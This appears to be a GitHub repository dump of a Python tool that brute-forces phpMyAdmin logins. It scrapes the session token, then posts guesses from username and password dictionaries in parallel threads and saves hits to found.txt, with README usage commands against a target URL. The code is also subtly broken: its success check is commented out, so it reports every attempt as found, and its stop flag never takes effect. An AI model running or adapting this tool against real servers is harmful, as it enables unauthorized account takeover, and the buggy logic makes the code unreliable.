├── .gitignore
├── LICENSE
├── README.md
├── main.py
├── password.txt
└── users.txt


/.gitignore:
--------------------------------------------------------------------------------
  1 | # Byte-compiled / optimized / DLL files
  2 | __pycache__/
  3 | *.py[cod]
  4 | *$py.class
  5 | 
  6 | # C extensions
  7 | *.so
  8 | 
  9 | # Distribution / packaging
 10 | .Python
 11 | build/
 12 | develop-eggs/
 13 | dist/
 14 | downloads/
 15 | eggs/
 16 | .eggs/
 17 | lib/
 18 | lib64/
 19 | parts/
 20 | sdist/
 21 | var/
 22 | wheels/
 23 | *.egg-info/
 24 | .installed.cfg
 25 | *.egg
 26 | MANIFEST
 27 | 
 28 | # PyInstaller
 29 | #  Usually these files are written by a python script from a template
 30 | #  before PyInstaller builds the exe, so as to inject date/other infos into it.
 31 | *.manifest
 32 | *.spec
 33 | 
 34 | # Installer logs
 35 | pip-log.txt
 36 | pip-delete-this-directory.txt
 37 | 
 38 | # Unit test / coverage reports
 39 | htmlcov/
 40 | .tox/
 41 | .coverage
 42 | .coverage.*
 43 | .cache
 44 | nosetests.xml
 45 | coverage.xml
 46 | *.cover
 47 | .hypothesis/
 48 | .pytest_cache/
 49 | 
 50 | # Translations
 51 | *.mo
 52 | *.pot
 53 | 
 54 | # Django stuff:
 55 | *.log
 56 | local_settings.py
 57 | db.sqlite3
 58 | 
 59 | # Flask stuff:
 60 | instance/
 61 | .webassets-cache
 62 | 
 63 | # Scrapy stuff:
 64 | .scrapy
 65 | 
 66 | # Sphinx documentation
 67 | docs/_build/
 68 | 
 69 | # PyBuilder
 70 | target/
 71 | 
 72 | # Jupyter Notebook
 73 | .ipynb_checkpoints
 74 | 
 75 | # pyenv
 76 | .python-version
 77 | 
 78 | # celery beat schedule file
 79 | celerybeat-schedule
 80 | 
 81 | # SageMath parsed files
 82 | *.sage.py
 83 | 
 84 | # Environments
 85 | .env
 86 | .venv
 87 | env/
 88 | venv/
 89 | ENV/
 90 | env.bak/
 91 | venv.bak/
 92 | 
 93 | # Spyder project settings
 94 | .spyderproject
 95 | .spyproject
 96 | 
 97 | # Rope project settings
 98 | .ropeproject
 99 | 
100 | # mkdocs documentation
101 | /site
102 | 
103 | # mypy
104 | .mypy_cache/
105 | 


--------------------------------------------------------------------------------
/LICENSE:
--------------------------------------------------------------------------------
 1 | MIT License
 2 | 
 3 | Copyright (c) 2019 Safflower
 4 | 
 5 | Permission is hereby granted, free of charge, to any person obtaining a copy
 6 | of this software and associated documentation files (the "Software"), to deal
 7 | in the Software without restriction, including without limitation the rights
 8 | to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
 9 | copies of the Software, and to permit persons to whom the Software is
10 | furnished to do so, subject to the following conditions:
11 | 
12 | The above copyright notice and this permission notice shall be included in all
13 | copies or substantial portions of the Software.
14 | 
15 | THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
16 | IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
17 | FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
18 | AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
19 | LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
20 | OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
21 | SOFTWARE.
22 | 


--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
 1 | # phpMyAdmin Authentication Bruteforce
 2 | 
 3 | tested on `phpMyAdmin 4.9.0.1`
 4 | 
 5 | `password.txt` file's source is: <https://github.com/danielmiessler/SecLists/blob/master/Passwords/Common-Credentials/10-million-password-list-top-1000000.txt>
 6 | 
 7 | 
 8 | Usage:
 9 | ```
10 | python3 main.py -url http://example.com/pma/ -user root -pdict password.txt
11 | ```
12 | OR
13 | ```
14 | python3 main.py -url http://example.com/pma/ -udict users.txt -pdict password.txt
15 | ```
16 | 


--------------------------------------------------------------------------------
/main.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/env python3
 2 | from ast import arg
 3 | from concurrent.futures import thread
 4 | import sys
 5 | import requests
 6 | import html
 7 | import re
 8 | import os
 9 | import argparse
10 | import threading, time
11 | 
12 | stop_flag = 0
13 | 
14 | def login(url, username, password):
15 | 	
16 | 	for i in range(3):
17 | 		try:
18 | 			res = requests.get(url)
19 | 			cookies = dict(res.cookies)
20 | 			data = {
21 | 				'set_session': html.unescape(re.search(r"name=\"set_session\" value=\"(.+?)\"", res.text, re.I).group(1)),
22 | 				'token': html.unescape(re.search(r"name=\"token\" value=\"(.+?)\"", res.text, re.I).group(1)),
23 | 				'pma_username': username,
24 | 				'pma_password': password,
25 | 			}
26 | 			res = requests.post(url, cookies=cookies, data=data)
27 | 			cookies = dict(res.cookies)
28 | 			#return 'pmaAuth-1' in cookies
29 | 			print("[*] FOUND - %s / %s" % (username, password))
30 | 			f = open("found.txt", "w")
31 | 			f.write("%s / %s\n" % (username, password))
32 | 			f.close()
33 | 			stop_flag = 1
34 | 		except:
35 | 			pass
36 | 	print("[!] FAILED - %s / %s" % (username, password))
37 | 
38 | 
39 | def bruteforce(users, passwords, url):
40 | 	for user in users:
41 | 		for password in passwords:
42 | 			try:
43 | 				if stop_flag == 1:
44 | 					t.join()
45 | 					exit()
46 | 				t = threading.Thread(target = login, args = (url, user, password))
47 | 				t.start()	
48 | 				time.sleep(0.2)
49 | 			except KeyboardInterrupt: 
50 | 				t.join()
51 | 				print("Cancelling")
52 | 				exit()
53 | 				
54 | 		t.join()	
55 | 	
56 | 				
57 | 
58 | def main():
59 | 	parser = argparse.ArgumentParser(description='e.g. python3 %s -url http://example.com/pma/ -user root -dict password.txt' % (os.path.basename(__file__)))
60 | 	parser.add_argument('-url', help='The URL of target website')
61 | 	parser.add_argument('-user', default='root', help='The username of MySQL (default: root)')
62 | 	parser.add_argument('-udict', default='none.txt', help='The file path of username dictionary (default: NULL)')
63 | 	parser.add_argument('-pdict', default='password.txt', help='The file path of password dictionary (default: password.txt)')
64 | 
65 | 	args = parser.parse_args()
66 | 	url = args.url
67 | 	pwdDictionary = args.pdict
68 | 	userDictionary = args.udict
69 | 
70 | 	if url is None:
71 | 		parser.print_help()
72 | 		return
73 | 
74 | 	#Getting passwords
75 | 	try:
76 | 		f = open(pwdDictionary, "r")
77 | 		passwords = re.split("[\r\n]+", f.read())
78 | 		f.close()
79 | 	except:
80 | 		print("[-] Failed to read '%s' file." % (pwdDictionary))
81 | 		return
82 | 
83 | 	#Getting users
84 | 	try:
85 | 		f = open(userDictionary, "r")
86 | 		users = re.split("[\r\n]+", f.read())
87 | 		f.close()
88 | 	except:
89 | 		users = [args.user]
90 | 	
91 | 	bruteforce(users, passwords, url)
92 | 
93 | 
94 | if __name__ == '__main__':
95 | 	main()
96 | 	


--------------------------------------------------------------------------------
/users.txt:
--------------------------------------------------------------------------------
1 | root
2 | admin
3 | user


--------------------------------------------------------------------------------